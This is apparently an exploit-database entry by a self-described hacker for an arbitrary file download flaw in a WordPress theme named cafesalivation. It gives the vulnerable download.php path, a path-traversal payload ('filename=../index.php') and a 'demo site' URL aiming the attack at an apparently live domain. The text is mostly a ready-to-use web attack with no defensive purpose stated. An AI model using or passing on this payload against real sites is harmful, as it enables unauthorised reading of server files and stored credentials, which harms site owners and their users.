id: 29599
date: 01/21/2018
title: Wordpress cafesalivation theme - Arbitrary file download Vulnerability
author: MrSqar
cves: 

-===================足====================足=================-
# Exploit title : Wordpress cafesalivation theme - Arbitrary file downloadliberator
# author : MrSqar Yemeni hacker
# Team : IT-Geeks
# Tested on : BackBox linux
# check if site is vulnerabe : /wp-content/themes/cafesalivation/download.php
you can download any script from the site by this method 
site.com/wp-content/themes/cafesalivation/download.php?filename=../index.php
# deom site :
https://www.cafesalivation.com/wp-content/themes/cafesalivation/download.php?filename=../index.php 
-===================足====================足=================-

#  0day.today [2023-03-23]  #